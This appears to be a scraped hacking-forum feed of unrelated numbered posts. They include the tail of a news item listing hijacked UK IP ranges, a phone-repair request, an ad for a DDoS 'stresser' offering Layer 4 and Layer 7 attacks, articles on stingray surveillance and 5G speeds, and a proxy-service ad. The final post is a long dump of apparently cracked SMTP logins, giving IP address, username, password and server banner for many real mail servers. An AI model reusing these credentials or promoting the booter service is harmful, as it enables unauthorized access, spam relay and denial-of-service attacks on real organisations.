(GB) 193.46.221.0/24 Continental DataGraphics Ltd (GB) 132.153.3.0/24 Atomic Weapons Establishment (GB) 194.169.69.0/24 BUILDING DESIGN PARTNERSHIP LIMITED (GB) 91.230.16.0/24 Dairy Crest Ltd (GB) 193.32.48.0/24 Virgin Money plc (GB) 193.36.240.0/24 Allen and Overy LLP (GB) 192.19.187.0/24 Avago Technologies U.S. Inc. (GB) 31.48.0.0/13 BT Public Internet Service (GB) 195.171.0.0/16 BT Public Internet Service (GB) 132.153.254.0/24 Atomic Weapons Establishment (GB) 213.120.0.0/14 BT Public Internet Service (GB) 91.223.126.0/24 Evolving Systems Limited (GB) 116.66.140.0/22 Cognizant Technology Solution India Pvt Ltd, India (GB) 81.128.0.0/11 BT Public Internet Service (GB) 195.182.62.0/24 The Football Association Ltd (GB) 185.30.8.0/22 Satellite Applications Catapult Limited (GB) 86.128.0.0/10 BT Public Internet Service (GB) 147.152.0.0/16 British Telecommunications PLC (GB) 162.62.136.0/22 Adaptec, Inc. (GB) 193.28.232.0/24 TEVA UK HOLDINGS LIMITED (GB) 193.238.232.0/24 Pinewood Technologies Plc (GB) 194.36.55.0/24 Hogg Robinson PLC (GB) 196.4.50.0/24 Uniserv Group (GB) 194.33.160.0/24 Office of Communications (GB) 161.163.177.0/24 Wal-Mart Stores, Inc. (GB) 194.130.197.0/24 MAID PLC (GB) 192.65.44.0/24 Tektronix, Inc. (GB) 192.189.160.0/24 Lafarge Tarmac Holdings Limited (GB) 132.153.252.0/24 Atomic Weapons Establishment (GB) 193.195.138.0/24 Telme Online Limited (GB) 193.33.244.0/24 AAH Pharmaceuticals Ltd (GB) 132.153.251.0/24 Atomic Weapons Establishment (GB) 198.200.211.0/24 Curtis Instruments, Inc. (GB) 193.46.76.0/24 Shire Pharmaceuticals Limited (GB) 144.98.0.0/16 RWE NPower (GB) 84.23.0.0/19 Biznet IIS Ltd. (GB) 158.234.0.0/16 CGI IT UK Ltd. (GB) 193.35.197.0/24 British Telecommunications PLC (GB) 194.60.136.0/24 Cornwall Council (GB) 146.174.170.0/23 Quantum Corporation (GB) 167.26.157.0/24 CIBC World Markets (GB) 109.205.158.0/24 BONTBLOCK (GB) 5.81.0.0/16 BT Infrastructure Layer (GB) 162.10.0.0/19 Doculynx Inc. (GB) 158.155.253.0/24 Computer Generation (GB) 165.197.56.0/22 Pepsi-Cola International (GB) 193.37.142.0/24 CSC IT Ltd (GB) 148.252.3.0/24 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 193.113.0.0/16 British Telecommunications PLC (GB) 194.36.248.0/24 WWRD United Kingdom Ltd (GB) 193.37.160.0/24 BT Public Internet Service (GB) 91.198.255.0/24 Sandwell Metropolitan Borough Council (GB) 192.65.227.0/24 British Telecommunications PLC (GB) 5.53.64.0/19 SAS Global Communications Ltd. (GB) 132.153.244.0/24 Atomic Weapons Establishment (GB) 170.136.115.0/24 Viad Corp (GB) 194.59.188.0/24 WCMC 2000 (GB) 194.132.25.0/24 WSP Europe (GB) 195.99.0.0/16 BT Public Internet Service (GB) 192.152.14.0/24 Aircraft Research Association Limited (GB) 159.10.208.0/22 CNA Insurance (GB) 199.181.156.0/24 ARC - Chicago (GB) 132.153.246.0/24 Atomic Weapons Establishment (GB) 192.65.224.0/24 British Telecommunications PLC (GB) 94.72.248.0/21 KCOM BT sub-allocation (GB) 193.238.233.0/24 Pinewood Technologies Plc (GB) 193.219.122.0/24 Significant (UK) Ltd (GB) 80.247.56.0/23 PGDS UK ONE - BT Internet - PG1 DC (GB) 192.65.228.0/24 British Telecommunications PLC (GB) 192.65.226.0/24 British Telecommunications PLC (GB) 194.169.32.0/24 AgustaWestland Ltd (GB) 204.124.211.0/24 Fruit of the Loom, Inc. (GB) 194.169.32.0/20 AgustaWestland Ltd (GB) 148.253.4.0/22 Department for Environment, Food and Rural Affairs (DEFRA) (GB) 194.132.24.0/24 WSP Europe (GB) 194.169.22.0/24 Isoft Health Ltd (GB) 132.153.247.0/24 Atomic Weapons Establishment (GB) 194.34.174.0/24 Allianz Insurance plc (GB) 161.163.166.0/24 Wal-Mart Stores, Inc. (GB) 195.8.202.0/23 Significant (UK) Ltd (GB) 192.31.31.0/24 British Telecommunications PLC (GB) 192.28.124.0/24 Lockheed Martin Corporation (GB) 212.140.0.0/16 BT Public Internet Service (GB) 193.195.7.0/24 Thus PLC t/a Demon Internet (GB) 192.19.199.0/24 Avago Technologies U.S. Inc. (GB) 91.233.33.0/24 Metropolitan Networks UK Ltd (GB) 192.65.222.0/24 British Telecommunications PLC (GB) 159.180.96.0/19 BT-CENTRAL-PLUS (GB) 165.120.0.0/16 BT Public Internet Service (GB) 155.202.124.0/22 SANTANDER UK PLC (GB) 150.147.68.0/24 Data Research Associates, Inc. (GB) 132.146.0.0/16 British Telecommunications PLC (GB) 109.144.0.0/12 BT Public Internet Service (GB) 159.253.66.0/23 KCOM Group Public Limited Company (GB) 142.205.161.0/24 Toronto Dominion Bank (GB) 62.7.0.0/16 BT Public Internet Service (GB) 62.239.0.0/16 British Telecommunications PLC (GB) 194.36.128.0/24 Hitachi Europe Ltd (GB) 194.32.3.0/24 Northern Ireland Civil Service (GB) 170.136.116.0/24 Viad Corp (GB) 217.32.0.0/12 BT Public Internet Service (GB) 192.65.219.0/24 British Telecommunications PLC (GB) 194.169.33.0/24 AgustaWestland Ltd (GB) 213.1.0.0/16 BT Public Internet Service (GB) 62.6.0.0/16 BT Public Internet Service (GB) 5.80.0.0/15 BT Public Internet Service (GB) 195.244.16.0/24 Websense SC Operations Limited (GB) 91.227.78.0/24 Ashridge (Bonar Law Memorial) Trust (GB) 194.169.36.0/24 AgustaWestland Ltd (GB) 193.131.115.0/24 Eurodollar (UK) Limited (GB) 192.65.223.0/24 British Telecommunications PLC (GB) 212.70.68.0/23 Intuitiv Ltd. (GB) 194.169.79.0/24 BUILDING DESIGN PARTNERSHIP LIMITED (GB) 132.153.250.0/24 Atomic Weapons Establishment (GB) 80.247.0.0/20 Net Energy Internet Ltd. (GB) 195.35.123.0/24 Toshiba Information Systems (UK) Ltd (GB) 194.130.196.0/24 MAID PLC (GB) 194.34.211.0/24 The Statistics Board (GB) 85.235.107.0/24 DMZ at Bacton. (GB) 146.198.0.0/16 INFONET Services Corporation (GB) 82.132.188.0/22 O2 Reference (UK) (GB) 194.72.0.0/14 BT Public Internet Service (GB) 213.249.188.0/22 KCOM Group Public Limited Company (GB) 194.34.210.0/24 The Statistics Board (GB) 194.34.205.0/24 The Statistics Board (GB) 192.65.225.0/24 British Telecommunications PLC (GB) 132.153.245.0/24 Atomic Weapons Establishment (GB) 132.153.253.0/24 Atomic Weapons Establishment (GB) 132.153.249.0/24 Atomic Weapons Establishment (GB) 162.116.126.0/24 Allergan, Inc. (GB) 91.247.73.0/24 Unipath Limited (GB) 145.229.0.0/16 Northern Ireland Civil Service (GB) 192.65.221.0/24 British Telecommunications PLC (GB) 149.223.0.0/16 TRW Automotive (GB) 194.169.35.0/24 AgustaWestland Ltd (GB) 167.26.158.0/24 CIBC World Markets (GB) 159.197.13.0/24 NATS (GB) 62.172.0.0/16 BT Public Internet Service (GB) 212.162.230.0/24 Royal Bank of Scotland plc (GB) 216.222.222.0/24 Smith and Nephew - Endoscopy (GB) 193.102.37.0/24 Softlab GmbH, Muenchen (GB) 194.102.0.0/19 British Telecommunications PLC (GB) 193.32.39.0/24 Sir Robert McAlpine Ltd (GB) 192.156.169.0/24 Syntellect Inc. (GB) 171.30.128.0/17 Global Crossing VHSDR service (GB) 132.153.248.0/24 Atomic Weapons Establishment (GB) 194.34.209.0/24 The Statistics Board (GB) 193.36.253.0/24 Allen and Overy LLP (GB) 195.95.131.0/24 NCC Services Ltd (GB) 152.134.0.0/16 SIX CONTINENTS LIMITED (GB) 61.28.219.0/24 Servcorp (GB) 194.34.223.0/24 Allianz Insurance plc (GB) 167.26.159.0/24 CIBC World Markets (GB) 193.39.141.0/24 AWE PLC (GB) A chart provided by Dyn showed that about a quarter of the Internet's large providers observed the roundabout path advised for Royal Mail Group, Limited, one of 14 groups with hijacked traffic that started Saturday. Well under 10 percent of large Internet providers observed the circuitous route Vega advised for the Atomic Weapons Establishment during the much shorter 90-minute window that diversion lasted. It's not clear if a similarly small portion of providers recognized the path advertised for the other 166 BT customers affected. Still, the diversion is significant given the number and stature of those customers. Source
  19. Salut,imi cer scuze daca am postat unde nu trebuia,dar am nevoie de ajutorul vostru. Detin un telefon Sony Xperia si am reusit sa-l stric mai exact cred ca s-a dus softul. Telefonul se restarteaza continuu sta aprins cam 1-2 minute si dupa se restarteaza iar. Din acest motiv caut un service competent sa-l repare nu vreau sa-l repar eu ca sigur il voi strica de tot. Service-ul sa fie din Iasi de preferat dar accept si din alta parte doar sa-l pot trimite prin curier la ei. Multumesc frumos,astept recomandarile voastre.
  20. Strong stresser is a Powerful Booter ! A Special Attacks for the website uses CloudFlare Service On Layer7. A Special Attacks to OVH Servers On Layer 4. STRONG Stresser | Test Security of Your Server & Neywork
  21. FOR YEARS THE government has kept mum about its use of a powerful phone surveillance technology known as a stingray. The Justice Department and local law enforcement agencies insist that the only reason for their secrecy is to prevent suspects from learning how the devices work and devising methods to thwart them. But a court filing recently uncovered by the ACLU suggests another reason for the secrecy: the fact that stingrays can disrupt cellular service for any phone in their vicinity—not just targeted phones—as well as any other mobile devices that use the same cellular network for connectivity as the targeted phone. Civil liberties groups have long asserted that stingrays are too invasive because they can sweep up data about every phone in their vicinity, not just targeted phones, and can interfere with their calls. Justice Department and local law enforcement agencies, however, have refused to confirm this or answer other questions about the tools. But in the newly uncovered document (.pdf)—a warrant application requesting approval to use a stingray—FBI Special Agent Michael A. Scimeca disclosed the disruptive capability to a judge. “Because of the way, the Mobile Equipment sometimes operates,” Scimeca wrote in his application, “its use has the potential to intermittently disrupt cellular service to a small fraction of Sprint’s wireless customers within its immediate vicinity. Any potential service disruption will be brief and minimized by reasonably limiting the scope and duration of the use of the Mobile Equipment.” The document was previously sealed and only came to light after the defense attorney for a defendant in the case filed a motion last year to dismiss evidence collected by the stingray. It’s the first time the ACLU has seen the FBI acknowledge the stingray’s disruptive capabilities and raises a number of questions about the nature of the disruption and whether the Federal Communications Commission knew about it when it certified the equipment. “We think the fact that stingrays block or drop calls of cell phone users in the vicinity should be of concern to cell service providers, the FCC, and ordinary people,” says Nate Wessler staff attorney with the ACLU’s Speech, Privacy, and Technology Project. “If an emergency or important/urgent call (to a doctor, a loved one, etc.) is blocked or dropped by this technology, that’s a serious problem.” Stingrays are mobile surveillance systems the size of a small briefcase that impersonate a legitimate cell phone tower in order to trick mobile phones and other mobile devices in their vicinity into connecting to them and revealing their unique ID and location. Stingrays emit a signal that is stronger than the signal of other cell towers in the vicinity in order to force mobile phones and other devices to establish a connection with them and reveal their unique ID. Stingrays can then determine the direction from which the phone connected with them, data that can then be used to track the movement of the phone as it continuously connects to the fake tower. Although stingrays are designed to recognize 911 calls and let them pass to legitimate cell towers without connecting to the stingray, the revelation from the FBI agent raises the possibility that other kinds of emergency calls not made to 911 may not get through. Law enforcement agencies around the country have been using variations of the stingray since the mid-90s to track the movement of suspects in this way. The technology is used by the FBI, the Secret Service, the U.S. Marshals Service, Customs and Border Patrol agents and the Drug Enforcement Agency as well as local law enforcement agencies in more than a dozen states. But the secrecy around their use has been extreme, due in part to non-disclosure agreements that law enforcement agencies sign with the companies that make stingrays. Stingrays Cloaked in Secrecy Authorities in several states have been caught deceiving judges and defense attorneys about how they use the controversial technology or have simply used the devices without obtaining a warrant in order to avoid disclosing their use to a court. In other cases they have withheld information from courts and defense attorneys about how the stingrays work, refraining from disclosing that the devices pick up location data on all systems in their vicinity, not just targeted phones. Law enforcement agencies have even gone so far as to intervene in public records requests to prevent the public from learning about the technology. The revelation in the court document is therefore significant and also begs the question: Who else knew about this capability and for how long? The Federal Communications Commission is responsible for certifying equipment that operates on radio frequencies to make sure that devices comply with certain technical standards and do not cause radio interference. If the companies that make stingrays failed to disclose the disruption of service to the federal agency, it would mean the devices had potentially been approved under false pretenses. The Harris Corporation in Florida—the leading maker of stingrays for law enforcement in the U.S. and an aggressive proponent of secrecy around their use—has already been singled out for a questionable statement the company made to the FCC in a 2010 email. In the correspondence, a Harris representative told the FCC that the technology was used by law enforcement only “in emergency situations.” But according to records the ACLU obtained from the police department in Tallahassee, Florida, in nearly 200 cases that the equipment was used since 2007 only 29 percent of these involved an emergency. Stingrays are regularly used in day-to-day criminal investigations to track suspected drug dealers, bank robbers and others. The FCC certified stingray equipment from Harris in April 2011 and March 2012. Asked whether the company disclosed the stingray’s disruptive capabilities to the FCC when it sought certification, an FCC official told WIRED, “We can’t comment on how the devices operate because that information is confidential in accordance with the FCC’s application process.” She said Harris had specifically “requested confidentiality in the application process.” She also said that if “wireless customers experiencing unexplained service disruptions or interference” report it to the FCC, the agency will “investigate the causes.” How Stingray Disruption Works The case in which the FBI disclosed the service disruption is ongoing and involves a defendant named Claude Williams who was suspected of participating in a string of armed bank robberies. In July 2012, the FBI’s Scimeca submitted an application for a warrant to use a stingray to track Williams’s phone. Although Scimeca was seeking authorization to use a stingray, he referred to it alternatively as mobile pen register and trap and trace equipment in his application. The nomenclature is important because the ACLU has long accused the government of misleading judges by using this term. Pen registers record the numbers dialed from a specific phone number, while trap and trace devices record the numbers that dial into a particular number. But stingrays are used primarily to track the location and movement of a device. Although Scimeca disclosed to the magistrate that the equipment could disrupt phone service, he didn’t elaborate about how the disruption might occur. Experts suspect it has something to do with the “catch-and-release” way stingrays work. For example, once the stingray obtains the unique ID of a device, it releases it so that it can connect to a legitimate cell tower, allowing data and voice calls to go through. “As each phone tries to connect, [the stingray] will say, ‘I’m really busy right now so go use a different tower. So rather than catching the phone, it will release it,” says Chris Soghoian, chief technologist for the ACLU. “The moment it tries to connect, [the stingray] can reject every single phone” that is not the target phone. But the stingray may or may not release phones immediately, Soghoian notes, and during this period disruption can occur. Disruption can also occur from the way stingrays force-downgrade mobile devices from 3G and 4G connectivity to 2G to get them to connect and reveal their unique ID and location. In order for the kind of stingray used by law enforcement to work, it exploits a vulnerability in the 2G protocol. Phones using 2G don’t authenticate cell towers, which means that a rogue tower can pass itself off as a legitimate cell tower. But because 3G and 4G networks have fixed this vulnerability, the stingray will jam these networks to force nearby phones to downgrade to the vulnerable 2G network to communicate. “Depending on how long the jamming is taking place, there’s going to be disruption,” says Soghoian. “When your phone goes down to 2G, your data just goes to hell. So at the very least you will have disruption of internet connectivity. And if and when the phones are using the stingray as their only tower, there will likely be an inability to receive or make calls.” “A Grave Threat to Privacy” Concerns about the use of stingrays is growing. Last week, Senator Bill Nelson (D—Florida) sent a letter to the FCC calling on the agency to disclose information about its certification process for approving stingrays and any other tools with similar functionality. Nelson asked in particular for information about any oversight put in place to make sure that use of the devices complies with the manufacturer’s representations to the FCC about how the technology works and is used. Nelson also raised concerns about their use in a remarkable speech on the Senate floor. The Senator said the technology “poses a grave threat to consumers’ cellphone and Internet privacy,” particularly when law enforcement agencies use them without a warrant. He also noted that invasive devices like the stingray will inevitably force lawmakers to come up with new ways to protect privacy. His combative speech marks the first time a lawmaker has called out the controversial technology in the public chamber. But his speech was also remarkable for another reason: Nelson’s state of Florida is home to the Harris Corporation, and the company is his second biggest campaign donor. Source
  22. ::::::::: 5SOCKS.NET ::::::::: Professional Proxy Socks 4/5 Service. We have been operating on the market since 2004. As distinct from our short-lived competitors, we got the name of one of the best service providers due to a high quality of services, not vain promises. We have traveled a long way, which was far from being easy. But despite all challenges, we regularly streamline and improve our service quality. So, anyone can enjoy advantages of the services that we are happy to provide to our customers. - 7000+ Proxy servers online Over 7000 proxy servers online daily. A large choice of countries and US states. - Updated GEO base A regularly updated GEO base enables us to provide you with a quality search and targeting. - Double proxy check We verify our database every five minutes. We also verify proxy servers that you have chosen just before the purchase. - Friendly interface Our easy-to-use admin panel features a search by country, US state, city, hostname, IP mask, connection rate, online time and domain name. - Proxy Helper: Our software An exclusive socksifier Proxy Helper is our software for direct operations with the proxy service which makes your activities as easy and comfortable as possible. read more ... - One-hour free test account Feel free to use a free test account to get a look at your user panel and try our proxies. Please contact our support team to obtain a test account. Plans & Pricing of our proxy service Scrins of our user panel Scrinshot was made 13:00 wednesday, 18 February 2015 ?. (GMT-5) New York , USA Our web site in Russian language here : ???????? ????? ?????? ?????? ??????? ?? ??????? ?????? ???????? 5socks.net team.
  23. New Generations usually bring new base technologies, more network capacity for more data per user, and high speed Internet service, for which Internet service providers usually advertise. However, it is believed that the fifth generation (5G Technology) of mobile network will be beyond our thoughts. 1TBPS OVER 5G Security researchers from the University of Surrey have just achieved Record-Breaking data speeds during a recent test of 5G wireless data connections, achieving an incredible One Terabit per second (1Tbps) speed – many thousands of times faster than the existing 4G connections. After 4G, 5G is the next generation of mobile communication technology that aims at offering far greater capacity and be faster, more energy-efficient and more cost-effective than anything that has seen before. The boffins say 5G will be different – very different. The 5G test was conducted at the university's 5G Innovation Centre (5GIC), which was founded by a host of telecoms industry partners including Huawei, Fujitsu, Samsung, Vodafone, EE, Aircom, BT, Telefonica, Aeroflex, BBC and Rohde & Schwarz. DOWNLOAD 100 MOVIES IN JUST 3 SECONDS 1Tbps of speeds are far faster than previously announced 5G tests – Samsung’s 7.5 gigabits per second (Gbps) record, which was 30 times faster than 4G LTE (Long-Term Evolution) speed and just less than 1% of the Surrey team's speed. With 1Tbps, it is possible to download a file 100 times the size of a feature film in just three seconds. This incredible speed is over 65,000 times faster than the current 4G download speeds. 5G EXPECTED TO ROLL OUT BY 2020 The test was carried out over a distance of 100 meters using equipment built at the university. The head of the 5GIC said he planned to demonstrate the technology to the public in 2018. It’s believed that 5G could possibly be available in the UK by 2020. UK communications regulator Ofcom has been supportive of efforts to get 5G to the public. Ofcom previously said it expected 5G mobile should be able to deliver speeds between 10 and 50Gbps, compared with the 4G average download speed of 15 Megabits per second (Mbps). There is a need to bring "end-to-end latency down to below one millisecond" in order to enable latest technologies and applications which would just not be possible with 4G. Tafazolli mentioned 3D holographic chess games on smartphones, controlling connected cars over 5G and other possible future applications requiring such low latency. 5G – NEW FRONTIER FOR CYBER ATTACKS 5G will, no doubt, provide a high speed Internet connectivity that would be really a great news for all, but that would be a distinction for cyber criminals as well. In Future, by leveraging 5G technology, it would be very easy for hackers and cybercriminals to take down almost any website on the Internet using Distributed Denial of Service (DDoS) attacks. In Era of expected 50Gbps Internet speed at home or business, there would be no need for cyber criminals to make a critical infrastructure of botnets by compromising hundreds of thousands of devices, rather they only need few devices with 5G Internet connection to launch the ever largest DDoS attack of around 1 Tbps. To resolve such issues in future, High speed Internet service providers and online communications service providers need to setup real time monitoring, reporting, limiting, and mitigation and protection mechanism against DDoS attacks in an attempt to protect online users. Source
  24. 200.32.93.222 demo demo|220 mail.dekagb.com 200.32.93.218 demo demo|220 DTCN7.dekagb.net Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 08:52:27 -0300 200.32.93.216 demo demo|220 mail.dekagb.com.ar 200.57.38.190 demo demo|220 mail.tralcom.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 05:55:13 -0600 200.55.165.50 director director|220 correo.tecnologico.co.cu ESMTP MDaemon 9.6.1; Sun, 08 Feb 2015 08:11:47 -0800 200.55.170.194 director director|220 citurvar.tur.cu ESMTP MDaemon 10.0.5; Sun, 08 Feb 2015 08:16:41 -0500 201.247.157.13 display display|220 navegante.com.sv modusMail ESMTP Receiver Version 4.7.840.5 Ready 200.169.219.12 dummy dummy|220 inosplex02.ptin.corpPT.com Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 12:41:32 -0200 200.252.137.68 dummy dummy|220 mail.patri.com.br Sun, 8 Feb 2015 12:47:55 -0200. 200.160.124.14 fax fax|220 S-FRONTMXCB.CBNET.COM.BR Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Sun, 8 Feb 2015 14:46:03 -0200 75.84.162.226 fax fax|220 ESMTP CMailServer 5.3.2005.07.08 SMTP Service Ready 200.88.222.227 front front|220 gshppvdat00.puertoplatavillage.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Sun, 8 Feb 2015 14:43:23 -0400 75.12.139.94 frontdesk frontdesk|220 mail.tomaslaw.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 13:04:58 -0600 200.11.75.69 ftpuser ftpuser|220 obi.tchile.com ESMTP Postfix 200.51.194.181 guest guest|220 LPPDTC4.cmpc.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 17:04:25 -0300 200.45.19.242 info info|220 mail.cpcecba.org.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 18:58:48 -0300 200.55.136.106 info info|220 dmarco.co.cu ESMTP MDaemon 11.0.3; Sun, 08 Feb 2015 16:56:28 -0500 201.247.100.140 info info|220 corsatursvr.corsatur.gob.sv Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 16:03:54 -0600 75.77.64.50 intern intern|220 mail.columbusmuseum.com 200.115.128.27 internet internet|220 viajero.eveloz.com ESMTP Exim 4.75 Sun, 08 Feb 2015 17:32:02 -0500 200.178.24.194 internet internet|220 mailserver.afam.com.br ESMTP (7aa3dafd2d1317454d56b449edfd3b79) 200.201.128.254 internet internet|220 GRANITO.geoklock.com.br Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 20:37:26 -0200 200.45.112.162 internet internet|220 mail.ctmm.com.ar Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 19:40:24 -0300 201.253.120.2 internet internet|220 mail.copanacea.com.ar Microsoft ESMTP MAIL Service ready at Sun, 8 Feb 2015 19:46:59 -0300 200.56.225.54 mail mail|220 ***************************************************************************************************** 201.234.138.19 mail mail|220 Mail01.telered.com.ar+-+El+envio+de+email+no+solicitado+sera+bloqueado+permanentemente. ESMTP 200.35.108.58 manager manager|220 relay.planinsa.com ESMTP Postfix (Ubuntu) 200.111.183.18 monitor monitor|220 smtp.bomberos.cl ESMTP IceWarp 10.4.6 (2013-07-25) RHEL6; Mon, 09 Feb 2015 00:09:50 -0300 200.123.137.43 monitor monitor|220 lexchangen01vpr.cabal.coop Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Mon, 9 Feb 2015 00:03:48 -0300 200.252.194.138 monitor monitor|220 mail.grupotodimo.com.br Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:12:36 -0300 200.54.77.43 monitor monitor|220 rosen.cl Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 00:09:36 -0300 200.54.77.42 monitor monitor|220 rosen.cl Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 00:09:36 -0300 200.58.120.66 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.64 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.67 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.69 news news|220 HMEXCAS01.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:19 -0300 200.58.120.65 news news|220 HMEXCAS02.host.hm.local Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 00:44:18 -0300 201.175.40.106 newsletter newsletter|220 ciclope.credisys.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Sun, 8 Feb 2015 22:00:00 -0600 200.159.76.162 operator operator|220 CARBONTIP.ecil.int Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 02:55:40 -0200 200.232.22.187 operator operator|220 CARBONTIP.ecil.int Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 02:57:17 -0200 200.42.173.146 oracle oracle|220 mail.crbcodelco.cl ESMTP Postfix (Debian/GNU) 200.108.214.63 postfix postfix|220 smtp.sonda.com.uy ESMTP Postfix 200.248.151.21 postgres postgres|220 MAILMTZV01.sulmaq.com.br Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 04:19:41 -0200 200.55.138.62 pr pr|220 geiconemail.geicon.cu ESMTP MDaemon 11.0.0; Mon, 09 Feb 2015 01:55:29 -0500 200.59.13.90 pr pr|220 transfurlong.com.ar ESMTP Service ready 200.110.31.228 printer printer|220 mail.OperadorSanta.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 02:16:36 -0500 200.142.97.46 printer printer|220 barboza.makeconsultores.com.br Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 05:01:45 -0200 75.77.194.50 printer printer|220 nas.clt.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 02:22:38 -0500 200.101.136.98 scanner scanner|220 ns1.sengespapel.com.br ESMTP - SengesPapel 200.122.225.194 scanner scanner|220 ************************* 200.127.152.132 scanner scanner|220 LURO7.edeaweb.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 07:43:32 -0300 200.148.141.27 scanner scanner|220 AUTO8KSPA.cieautometal.com.br Microsoft ESMTP MAIL Service, Version: 7.5.7601.17514 ready at Mon, 9 Feb 2015 08:44:45 -0200 200.149.223.180 scanner scanner|220 GT-SRV-EXMBS01.tecnometal.net Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 08:44:47 -0200 200.169.19.118 scanner scanner|220 mail.federasul.com.br Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 08:42:10 -0200 200.175.156.47 scanner scanner|220 mail.provenda.com.br ESMTP Postfix 200.205.46.26 scanner scanner|220 *********************************************************************************************** 200.251.41.34 scanner scanner|220 mail.fundacaolibertas.com.br ESMTP Postfix 200.31.85.51 scanner scanner|220 AROLENHUB01.arolen.corp Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 05:49:42 -0500 200.51.96.196 scanner scanner|220 eofe2k10.estudio-ofarrell.com.ar Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 07:51:46 -0300 200.55.9.130 scanner scanner|220 SESME04.esme.corp Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 07:51:41 -0300 200.6.115.125 scanner scanner|220 correo2010.corp.iia.cl Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 07:52:36 -0300 200.6.122.206 scanner scanner|220 molle.tchile.com ESMTP Postfix 200.68.19.131 scanner scanner|220 mail.herenciaresources.cl ESMTP 200.68.115.89 scanner scanner|220 mail.maianviajes.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 07:52:48 -0300 200.70.55.130 scanner scanner|220 mail.fagra.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 07:52:56 -0300 201.216.246.73 scanner scanner|220 srvgateway2.adwargentina.com.ar Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 08:00:00 -0300 75.56.238.13 scanner scanner|220 marklin.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 04:55:29 -0600 75.77.14.131 scanner scanner|220 PPMEXCH-CT01.precisionpractice.com Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 04:55:30 -0600 75.56.239.57 shipping shipping|220 mail.ghwilke.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 06:16:43 -0600 75.77.35.130 shipping shipping|220 mail.questgraphics.com Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 06:16:45 -0600 200.6.117.54 software software|220 web004.anacondaweb.com ESMTP Sendmail 8.13.8/8.13.8; Mon, 9 Feb 2015 10:34:22 -0300 200.123.133.161 spam spam|220 exmdt.bsas.mdtmdt.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.4675 ready at Mon, 9 Feb 2015 10:42:19 -0300 200.194.232.114 spam spam|220 trinity.sodisa.com.br ESMTP 200.71.234.158 spam spam|220 hospitalprivadosa.com.ar ESMTP MDaemon 11.0.3; Mon, 09 Feb 2015 10:51:32 -0300 200.85.168.91 spam spam|220 cndc.org.ni ESMTP MDaemon 13.0.4; Mon, 09 Feb 2015 07:52:03 -0600 200.111.67.74 supervisor supervisor|220 at6425.tchile.com ESMTP Postfix 200.77.232.115 supervisor supervisor|220 CORPKIOE2K708.corp.televisa.com.mx Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 08:40:42 -0600 200.77.232.114 supervisor supervisor|220 CORPKIOE2K708.corp.televisa.com.mx Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 08:40:42 -0600 201.234.152.174 terminal terminal|220 insrvexvm.INDELMA.LOCAL Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready at Mon, 9 Feb 2015 13:48:11 -0300 200.55.198.132 test test|220 EXCH01.ceim-fee.cl Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 13:58:04 -0300 201.225.228.126 test test|220 PAAFIS01.cafis.com ESMTP MailEnable Service, Version: 1.986-- ready at 02/09/15 09:05:42 200.108.214.2 tester tester|220 Amaranto.ccagraria.com.uy Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 15:37:43 -0200 200.40.236.20 tester tester|220 Amaranto.ccagraria.com.uy Microsoft ESMTP MAIL Service ready at Mon, 9 Feb 2015 15:48:16 